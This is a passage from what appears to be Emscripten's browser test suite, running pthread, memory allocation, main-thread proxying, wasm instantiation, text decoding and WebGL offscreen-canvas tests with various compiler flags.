self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--closure', '1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS=1'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(path_from_root('tests', 'unistd', 'io.c'), 0, args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(path_from_root('tests', 'pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME=1'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS=1',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS=1',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest(path_from_root('tests', 'core', 'test_main_thread_async_em_asm.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_test_file('page.html',
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([path_from_root('tests', 'browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# test atomicrmw i64
@no_wasm_backend('uses an asm.js .ll file')
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('mem init file')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([path_from_root('tests', 'in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
self.compile_btest([path_from_root('tests/manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5368), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
self.skipTest('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER=1',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION=1'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
